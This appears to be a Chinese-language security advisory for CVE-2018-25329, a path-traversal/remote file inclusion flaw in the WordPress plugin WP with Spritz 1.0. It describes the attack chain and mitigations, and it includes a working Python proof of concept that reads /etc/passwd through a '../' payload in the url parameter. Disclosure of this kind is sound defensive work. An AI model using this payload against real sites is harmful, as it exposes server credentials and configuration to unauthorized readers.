CVE-2018-25329 CVSS 7.5 高危

CVE-2018-25329 WP with Spritz远程文件包含漏洞

披露日期: 2026-05-17

来源: [email protected]

漏洞信息

漏洞编号

CVE-2018-25329

漏洞类型

远程文件包含

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

WordPress Plugin WP with Spritz

漏洞概述

WordPress插件WP with Spritz 1.0存在远程文件包含漏洞。该漏洞允许未经身份验证的攻击者通过向特定PHP文件发送恶意构造的GET请求，利用url参数读取服务器上的任意敏感文件。攻击者无需用户交互即可利用此漏洞获取系统配置和凭证信息，对网站数据机密性造成严重影响。

技术细节

该漏洞存在于WordPress插件WP with Spritz 1.0的wp.spritz.content.filter.php文件中。其根本原因在于代码直接使用了用户通过GET请求提交的‘url’参数，并将其作为路径传入了文件包含或读取函数，且未实施任何安全过滤或路径校验机制。攻击者利用这一缺陷，可以构造包含目录遍历字符（如‘../’）的特殊Payload，从而绕过目录限制，读取服务器上Web用户有权限访问的任意文件。由于该攻击无需任何身份验证即可触发，且通过网络即可发起，因此攻击者可以轻易利用此漏洞获取敏感的配置信息（如数据库凭证）或源代码。该漏洞CVSS评分7.5，属于高危漏洞，主要影响机密性，对完整性和可用性无直接影响，但对网站安全构成严重威胁。

攻击链分析

STEP 1

侦察

攻击者扫描目标网站，识别是否安装了WordPress WP with Spritz插件及其版本。

STEP 2

利用

攻击者向wp.spritz.content.filter.php发送特制的GET请求，在url参数中插入目录遍历序列（如../），试图读取敏感文件。

STEP 3

数据泄露

服务器响应并返回请求的文件内容（如/etc/passwd或wp-config.php），攻击者获取敏感信息。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def check_vulnerability(target_url):
    """
    PoC for CVE-2018-25329
    Attempts to read /etc/passwd using the vulnerable url parameter.
    """
    # The vulnerable endpoint path
    full_url = f"{target_url}/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php"
    
    # Malicious payload to traverse directories and read a file
    params = {
        "url": "../../../../../../../../etc/passwd"
    }

    try:
        response = requests.get(full_url, params=params, timeout=10)
        
        # Check if the response contains typical /etc/passwd markers
        if "root:x" in response.text:
            print(f"[+] Vulnerability confirmed at {target_url}")
            print(f"[+] Response content snippet:\n{response.text[:200]}")
        else:
            print(f"[-] Vulnerability not detected or file not found.")
            
    except requests.exceptions.RequestException as e:
        print(f"[!] Error connecting to target: {e}")

if __name__ == "__main__":
    # Replace with the target WordPress site URL
    target = "http://example.com"
    check_vulnerability(target)

影响范围

WP with Spritz 1.0

防御指南

临时缓解措施

建议立即检查服务器上是否安装了WP with Spritz插件，并尽快将其升级至最新修复版本或直接卸载。如果无法立即升级，应通过Web服务器配置（如.htaccess）严格限制对wp-content/plugins/wp-with-spritz/目录的访问，只允许特定IP访问，或使用WAF规则拦截针对wp.spritz.content.filter.php的异常请求参数。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表